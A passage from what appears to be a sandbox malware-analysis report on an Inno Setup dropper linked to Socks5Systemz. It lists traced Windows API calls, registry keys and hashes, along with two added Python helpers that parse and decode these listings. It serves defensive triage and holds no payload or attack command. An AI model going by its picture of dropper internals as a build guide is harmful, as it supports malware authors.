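• Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
• Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
• Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
• Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
• Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
• SetErrorMode.KERNEL32(00000001,00000000,0049712B), ref: 004970FD
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 004741F1
"""

# Line shape used by the report: optional "Part of subcall function ADDR:",
# then Api.MODULE(slot,slot,...), ref: ADDR. Slots are hex words, strings or '?'.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-F]{8}$")

# Win32 constants (winnt.h / winbase.h values).
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTR = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
             0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x80000000: "FILE_FLAG_WRITE_THROUGH"}
ERROR_MODE = {0x1: "SEM_FAILCRITICALERRORS", 0x2: "SEM_NOGPFAULTERRORBOX",
              0x4: "SEM_NOALIGNMENTFAULTEXCEPT", 0x8000: "SEM_NOOPENFILEERRORBOX"}
DEP_POLICY = {0x1: "PROCESS_DEP_ENABLE", 0x2: "PROCESS_DEP_DISABLE_ATL_THUNK_EMULATION"}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple            # raw slot strings, in stack order
    ref: str               # address of the call instruction
    parent: Optional[str]  # sub-function address when the call is indirect


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    args = tuple(a for a in m.group("args").split(",") if a)
    return ApiCall(m.group("api"), m.group("module"), args, m.group("ref"), m.group("parent"))


def parse_api_lines(text: str) -> list:
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


def resolved_imports(calls) -> list:
    """Names looked up at run time through GetProcAddress (slot 2 = lpProcName).
    Heuristic: hex words and '?' are unresolved pointers, and a '*.dll' string is
    a stale slot left over from the preceding GetModuleHandleA; both are skipped."""
    names = []
    for c in calls:
        if c.api != "GetProcAddress" or len(c.args) < 2:
            continue
        name = c.args[1]
        if name == "?" or HEX8.match(name) or name.lower().endswith(".dll"):
            continue
        if name not in names:
            names.append(name)
    return names


def _int(slot: str) -> Optional[int]:
    return int(slot, 16) if HEX8.match(slot) else None


def _flags(value: int, table: dict) -> str:
    names = [n for bit, n in table.items() if value & bit]
    leftover = value & ~sum(table)      # bits the table does not name
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) or "0"


def decode_call(call: ApiCall) -> dict:
    """Readable decoding of the flag words for the APIs analysts read most often
    in these listings. Only slots inside the API's real parameter count are used."""
    a = call.args
    if call.api == "CreateFileA" and len(a) >= 6 and None not in (_int(a[1]), _int(a[4]), _int(a[5])):
        return {"access": _flags(_int(a[1]), ACCESS),
                "disposition": DISPOSITION.get(_int(a[4]), hex(_int(a[4]))),
                "attributes": _flags(_int(a[5]), FILE_ATTR)}
    if call.api == "SetErrorMode" and a and _int(a[0]) is not None:
        return {"mode": _flags(_int(a[0]), ERROR_MODE)}
    if call.api == "SetProcessDEPPolicy" and a and _int(a[0]) is not None:
        return {"policy": _flags(_int(a[0]), DEP_POLICY)}
    return {}


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_LINES)
    print("run-time resolved:", resolved_imports(calls))
    for c in calls:
        decoded = decode_call(c)
        if decoded:
            print(f"{c.ref} {c.api}: {decoded}")
```

Run against the embedded lines, the helper reports SetDllDirectoryW and SetProcessDEPPolicy as run-time resolved names, decodes the CreateFileA call at 004741F1 as GENERIC_READ|GENERIC_WRITE with CREATE_NEW and FILE_ATTRIBUTE_NORMAL, SetErrorMode(1) as SEM_FAILCRITICALERRORS and SetProcessDEPPolicy(1) as PROCESS_DEP_ENABLE. Because the slot values are reconstructed rather than observed, treat the decoded output as a reading aid for the listing and confirm anything that matters in the debugger.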
                                                                                            APIs
                                                                                              • Part of subcall function 0045623C: CoInitialize.OLE32(00000000), ref: 00456242
                                                                                              • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                              • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                            • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                            • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                            • API String ID: 2906209438-2320870614
                                                                                            • Opcode ID: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
                                                                                            • Instruction ID: 517aaa95fd919f42fec07b3e20ba2fe3b86c01757d5d2d7eeafb2f6c84d6a724
                                                                                            • Opcode Fuzzy Hash: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
                                                                                            • Instruction Fuzzy Hash: 4CC040D074455095CA0077FB540374F14149750717F5180BFB848675C7DF3D440D566E
                                                                                            APIs
                                                                                              • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                              • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                            • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressErrorLibraryLoadModeProc
                                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                            • API String ID: 2492108670-2683653824
                                                                                            • Opcode ID: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
                                                                                            • Instruction ID: f15142af1028fbda52646c9d138091dcd6bfc2c127db856ea005f68399f83491
                                                                                            • Opcode Fuzzy Hash: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
                                                                                            • Instruction Fuzzy Hash: 76B092A0B00780C6CE00BBB3A8127871528D740704B10C07F7240EA696FF7E8C458FEE
                                                                                            APIs
                                                                                            • GetSystemMenu.USER32(00000000,00000000,00000000,00480368), ref: 00480300
                                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00480311
                                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00480329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Append$System
                                                                                            • String ID:
                                                                                            • API String ID: 1489644407-0
                                                                                            • Opcode ID: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
                                                                                            • Instruction ID: 04a05a6f5988e1ad1c69e12ed442e821a58669dfeb252773ef60a283987a992a
                                                                                            • Opcode Fuzzy Hash: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
                                                                                            • Instruction Fuzzy Hash: 3431B0707043441BD721FB769C8AB9E3A949B1531CF5408BBF800AA3D3CABC9C09879D
APIs
• 73A0A570.USER32(00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044AC55
• SelectObject.GDI32(?,00000000), ref: 0044AC78
• 73A0A480.USER32(00000000,?,0044ACB8,00000000,0044ACB1,?,00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044ACAB
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: A480A570ObjectSelect
• String ID:
• API String ID: 1230475511-0
• Opcode ID: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
• Instruction ID: 3b5f26ead791ea6387a249f2cdaddc54e41ca9264cf2fbaff888b01415335cc3
• Opcode Fuzzy Hash: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
• Instruction Fuzzy Hash: CA21B670E44248AFEB01DFA5C885B9F7BB9EB48304F41807AF500E7281D77C9950CB6A
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9A0,?,00480B97,?,?), ref: 0044A972
• DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A985
• DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9B9
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: DrawText$ByteCharMultiWide
• String ID:
• API String ID: 65125430-0
• Opcode ID: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
• Instruction ID: 8b0288b9d3461177b0e2011e4a6e3c0ecae8d00baf86e8e824f1a66b6306016d
• Opcode Fuzzy Hash: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
• Instruction Fuzzy Hash: 0E11B6B27446047FEB10DAAA9C82E6FB7ECEB49724F10417BF504E7290D6389E018669
APIs
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
• TranslateMessage.USER32(?), ref: 0042449F
• DispatchMessageA.USER32(?), ref: 004244A9
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Message$DispatchPeekTranslate
• String ID:
• API String ID: 4217535847-0
• Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
• Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
• Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
• Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
APIs
• SetPropA.USER32(00000000,00000000), ref: 0041667A
• SetPropA.USER32(00000000,00000000), ref: 0041668F
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Prop$Window
• String ID:
• API String ID: 3363284559-0
• Opcode ID: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
• Instruction ID: 52b24e3238e4314aade48f96f4600562d70e15a3c995b5dbeb32d15e299d8853
• Opcode Fuzzy Hash: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
• Instruction Fuzzy Hash: 4CF0BD71701220ABEB10AB598C85FA632DCAB09715F16017ABE09EF286C678DC50C7A8
APIs
• IsWindowVisible.USER32(?), ref: 0041EE74
• IsWindowEnabled.USER32(?), ref: 0041EE7E
• EnableWindow.USER32(?,00000000), ref: 0041EEA4
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Window$EnableEnabledVisible
• String ID:
• API String ID: 3234591441-0
• Opcode ID: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
• Instruction ID: 4e94e345e4a8e87798afb8fb42df504bf5387c41ee1a2ac16dc0d48b177cce37
• Opcode Fuzzy Hash: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
• Instruction Fuzzy Hash: 4DE0EDB8100304AAE750AB2BEC81A57769CBB55314F49843BAC099B293DA3ED8449A78
APIs
• SetActiveWindow.USER32(?), ref: 00480C2A
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: ActiveWindow
• String ID: InitializeWizard
• API String ID: 2558294473-2356795471
• Opcode ID: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
• Instruction ID: 7183a9f40d151cc4564f9c637f0f3a65215fdab84d47651bf6ef09736f3ca39c
• Opcode Fuzzy Hash: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
• Instruction Fuzzy Hash: C511C1302142049FD754EB6AFD82B0A7BA8E716728F10447BE810C77A1EB79AC64C79D
APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047B222,00000000,0047B35C), ref: 0047B021
Strings
• Software\Microsoft\Windows\CurrentVersion, xrefs: 0047AFF1
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: CloseOpen
• String ID: Software\Microsoft\Windows\CurrentVersion
• API String ID: 47109696-1019749484
• Opcode ID: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
• Instruction ID: 32b1a4b4f3febb624688285ac2ab15cdeec5a734a0466c395ac52858640c886b
• Opcode Fuzzy Hash: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
• Instruction Fuzzy Hash: 7CF0E93170021467D700A55A6D02BAF528DCB80358F20407FF508EB342DABA9D06039C
APIs
• RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
Strings
• Inno Setup: Setup Version, xrefs: 0046DE8D
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Value
• String ID: Inno Setup: Setup Version
• API String ID: 3702945584-4166306022
• Opcode ID: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
• Instruction ID: 3f565b73c41be68d18d1c675279a4c2ca8d62721aeaae2bfa6e8ff1167108c85
• Opcode Fuzzy Hash: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
• Instruction Fuzzy Hash: 6AE06D717016043FD710AA2BDC85F6BBADCDF983A5F10403AB908EB392D578DD0081A8
APIs
• RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046E544,?,?,00000000,0046E6DA,?,_is1,?), ref: 0046DEEF
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Value
• String ID: NoModify
• API String ID: 3702945584-1699962838
• Opcode ID: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
• Instruction ID: 16e32e904041cf2989cb5be4c2021f94977a521c7974260517dd4293f9cbe128
• Opcode Fuzzy Hash: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
• Instruction Fuzzy Hash: 64E04FB0A04304BFEB04EB55CD4AF6F77ACDB48754F104059BA089B291E674EE00C668
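The function entries above are only useful to an analyst once the "APIs" lines are pulled out of the listing and grouped: which imports the plugin could not name (entries such as 73A0A570.USER32, where an address stands in for the symbol), which registry roots and subkeys are opened (80000002 is HKEY_LOCAL_MACHINE), and which values are written next to the "_is1" marker that Inno Setup appends to its per-application uninstall key. The parser below is an added example and is not part of this report or of Joe Sandbox's tooling; the sample lines are copied from the entries on this page, the line grammar it assumes is "• Name.MODULE(args), ref: ADDRESS" with an optional "Part of subcall function ADDRESS:" prefix, and the reading of an all-hex name as an unresolved import is the editor's interpretation rather than something the report states.

```python
"""Parse Joe Sandbox function-listing API lines and surface the registry /
installer indicators worth triaging first (added example, not report code)."""
import re
from dataclasses import dataclass
from typing import Optional

# API-trace lines copied verbatim from this report's "APIs" entries above.
SAMPLE_LINES = r"""
• GetSystemMenu.USER32(00000000,00000000,00000000,00480368), ref: 00480300
• 73A0A570.USER32(00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044AC55
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047B222,00000000,0047B35C), ref: 0047B021
• RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
• RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046E544,?,?,00000000,0046E6DA,?,_is1), ref: 0046DEEF
"""

# Assumed line grammar: bullet, optional subcall prefix, Name.MODULE(args), ref: ADDR
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z0-9_@]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
ADDRESS_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Predefined registry root handles from winreg.h; the report prints them as hex.
ROOT_KEYS = {
    "80000000": "HKEY_CLASSES_ROOT",
    "80000001": "HKEY_CURRENT_USER",
    "80000002": "HKEY_LOCAL_MACHINE",
    "80000003": "HKEY_USERS",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]          # "?" marks an argument the sandbox could not recover
    ref: str                 # address of the call site
    subcall: Optional[str]   # set when the line came from "Part of subcall function"

    @property
    def resolved(self) -> bool:
        # Interpretation (assumption): an all-hex "name" such as 73A0A570 is an
        # import the plugin could not map back to a symbol.
        return ADDRESS_RE.match(self.api) is None


def parse_api_lines(text: str) -> list[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # section headers ("APIs", "Strings") and blank lines
        calls.append(ApiCall(
            api=m["api"], module=m["module"],
            args=[a.strip() for a in m["args"].split(",")],
            ref=m["ref"], subcall=m["subcall"],
        ))
    return calls


def root_key_name(arg: str) -> Optional[str]:
    return ROOT_KEYS.get(arg.upper())


def unresolved_imports(calls: list[ApiCall]) -> list[str]:
    return [c.api for c in calls if not c.resolved]


def registry_opens(calls: list[ApiCall]) -> list[tuple[str, str]]:
    """(root key, subkey) for every RegOpenKeyEx*/RegCreateKeyEx* call seen."""
    out = []
    for c in calls:
        if c.api.startswith(("RegOpenKeyEx", "RegCreateKeyEx")) and len(c.args) >= 2:
            out.append((root_key_name(c.args[0]) or c.args[0], c.args[1]))
    return out


def inno_setup_value_names(calls: list[ApiCall]) -> list[str]:
    """Value names written by RegSetValueEx* while '_is1' (the suffix Inno Setup
    gives its uninstall key, <AppId>_is1) is visible among the stack arguments."""
    names = {c.args[1] for c in calls
             if c.api.startswith("RegSetValueEx") and len(c.args) >= 2
             and "_is1" in c.args}
    return sorted(names)


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_LINES)
    for c in calls:
        tag = "" if c.resolved else "  (unresolved import)"
        print(f"{c.ref}: {c.api}.{c.module}{tag}")
    print("registry opens:", registry_opens(calls))
    print("Inno Setup uninstall-key values:", inno_setup_value_names(calls))
```

Run against the seven lines embedded above it reports one unresolved import (73A0A570), one HKEY_LOCAL_MACHINE open of System\CurrentControlSet\Control\Windows reached through the 0042DD44 subcall, and the two value names (Inno Setup: Setup Version, NoModify) written under the _is1 uninstall key, which is the combination that identifies the dropper as an Inno Setup installer before any of the Socks5Systemz payload behaviour is examined.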
APIs
• RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
Strings
• System\CurrentControlSet\Control\Windows, xrefs: 0042DD5E
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Open
• String ID: System\CurrentControlSet\Control\Windows
• API String ID: 71445658-1109719901
• Opcode ID: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
